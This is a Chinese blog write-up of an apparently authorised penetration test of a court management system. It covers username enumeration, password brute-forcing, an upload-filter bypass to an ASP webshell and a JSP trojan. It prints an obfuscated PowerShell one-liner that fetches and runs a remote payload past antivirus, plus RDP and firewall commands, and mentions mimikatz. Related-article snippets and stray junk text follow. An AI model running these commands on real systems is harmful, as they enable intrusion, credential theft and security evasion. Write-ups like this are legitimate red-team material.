<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    RT對某法院授權滲透測試

    VSole2022-08-14 09:03:51

    目標站點是某法院的科技法庭管理系統

    在登錄的時候發現存在用戶名遍歷漏洞

    用burp的username字典爆破除了存在的用戶名 再根據自用的字典成功爆破出了后臺用戶

    所以說打紅隊的時候弱口令是YYDS

    第二部進入后臺找上傳點,進入用戶特有的法院助手系統

    沒有出現圖片上傳點,但有doc文檔上傳點

    開始的目標重心是關注后綴是否可控,大小寫繞過,%00繞過均沒有成功響應,直接亂輸一個后綴名,發現依然沒有回應。莫非是白名單過濾?正常的doc是能夠返回路徑的,訪問url直接下載文件。

    在上面圖片的中template找到了突破口,我發現更改template (模板)的值后,文件的回顯目錄發生了變化,猜測該系統是根據文件類型來定義上傳保存目錄,doc是默認保存在靜態目錄下的,于是將改成asp后綴,在對應在文件名修改成asp,成功回顯目錄,拿下webshell

    然而覺得一切開始好起來的時候,在上線CS的時候遇到不少問題,因為目標IIS服務器上是部署了火絨的

    開始我想直接web投遞一句話,發現拒絕訪問,應該是被攔截。然后用內存加載shell的方式,上傳了加載器和shellcode進行上線,也沒有成功,感覺是環境問題,或者火絨直接不準腳本運行?因為我的加載器免殺Win10 360 火絨雙開都是能過的。

    既然說不允許訪問powershell,考慮應該是權限問題,于是將重心放在了提權上面,之前的思路是上線CS方便橫向滲透,順便跑一波提權腳本,但是現在這條路應該走不下去了,低權限的webshell,還有火絨攔截,應該比較麻煩,這里拋磚引玉,希望大佬有更好的解決辦法。

    我是直接陷入了困境,開始訪問目標機器上的一些配置文件,比如其他旁站,比如sql的賬號密碼之類的,結果我意外的發現了tomcat/webapp/doc,這不是tomcat嗎?

    為了驗證目標機器搭載了tomcat服務,我訪問了對應web,發現確實存在,喜出望外,在webapp下寫入了jsp木馬,成功拿下管理員權限,為了進一步dumphash,開3389,用unicode加密的powershell繞過了火絨成功上線。

    powshell代碼參考以下

    cmd /c echo set-alias -name xz -value IEX;x^z (New-Object "NeT.WeBClienT").d^o^w^n^l^o^a^d^s^t^r^i^n^g('ht'+'tP://1’+'1.111.11.1:80'+'/a') | p^o^w^e^r^s^h^e^l^l 
    

    需要提權在cs的web投遞做好設置。

    之后用mimikatz和CS的hashdump導出了管理員密碼,執行命令關閉防火墻,成功連接3389。

    啟動3389端口

    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    

    加防火墻規則

    netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=338
    

    遠程之后把火絨關了,之后的路就好走多了 上傳fscan進行內網大保健

    跑了一堆打印機和未授權弱口令等等

    不過多說明

    因為該服務器沒有其他網卡的機器,也不能通過內網web和ftp等方式進一步拿下同網段其他IP, 所以就把這些攻擊結果截圖提交了

    最后我發現,其實之前不一定非得上線CS,因為蟻劍的后滲透框架也是非常強大的,可以直接通過他的反彈shell模塊成功上線到MSF

    而且不會報毒,火絨是沒有攔截的

    但是至于提權,肯定是沒有tomcat提權舒服的 也可以通過MSF拿下webshell之后代理然后去穿內網。也是一種思路吧。

    滲透測試火絨
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    釣魚常用手法總結
    2022-03-24 13:48:29
    雷神眾測擁有對此文章的修改和解釋權。如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。未經雷神眾測允許,不得任意修改或者增減此文章內容,不得以任何方式將其用于商業目的。
    滲透測試Tips
    2022-04-13 06:38:50
    知己知彼,百戰不殆1、如果提示缺少參數,如{msg:params error},可嘗使用字典模糊測試構造參數,進一步攻擊。
    正常的doc是能夠返回路徑的,訪問url直接下載文件。為了驗證目標機器搭載了tomcat服務,我訪問了對應web,發現確實存在,喜出望外,在webapp下寫入了jsp木馬,成功拿下管理員權限,為了進一步dumphash,開3389,用unicode加密的powershell繞過了火絨成功上線。
    0x01前言 由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,文章作者不為此承擔任何責任。 0x02 內網滲透 利用shiro rce拿到shell上線CS
    這樣就獲取了system權限,接下來就是對機器進行信息搜集,獲取對我們橫向滲透有幫助的信息。其中記錄了tomcat部署的路徑,以及備份的源碼文件。經過一番爆破,發現了一臺機器oracle數據庫system用戶密碼未修改,為manager。大家應該知道oracle數據庫是可以執行系統命令的,而system用戶完全符合執行系統命令的條件。后面發現是火絨攔截了異常行為。
    接口未授權在嘗是了一波js接口后沒有發現什么漏洞,但是查找到了一些信息泄露。sql注入(兩枚)在剛剛注冊了用戶,登錄進去。第一處將url和參數進行拼接。第二處第二處同樣是js文件內找到。在圖片中間的地方插入xss語句但是如果沒有找到可以注冊的api,則這個漏洞無法利用,為了擴大漏洞危害,嘗試刪除cookie,是否可以未授權文件上傳。
    現在只對常讀和星標的公眾號才展示大圖推送,建議大家把瀟湘信安“設為星標”,否則可能看不到了!0x00 前言對國外某地產公司的一次測試測試過程中每一步都有阻礙,不像以往的一帆風順,對其中涉及的一些點進行一個簡單的記錄,碼較厚,見諒。
    0x01 前言我們在滲透測試過程中時常會用到一些腳本,而現在大部分的WAF或殺軟都會根據一些危險組件名、特定字符做為特征來查殺,只要找到其特征,我們可以使用簡單的混淆、拼接等方式來進行免殺。
    基于Windows打造的一個滲透測試套件工具包,非常不錯的一個項目,有喜歡的可以點個Star支持一下,有問題也可以提交Issues反饋!
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类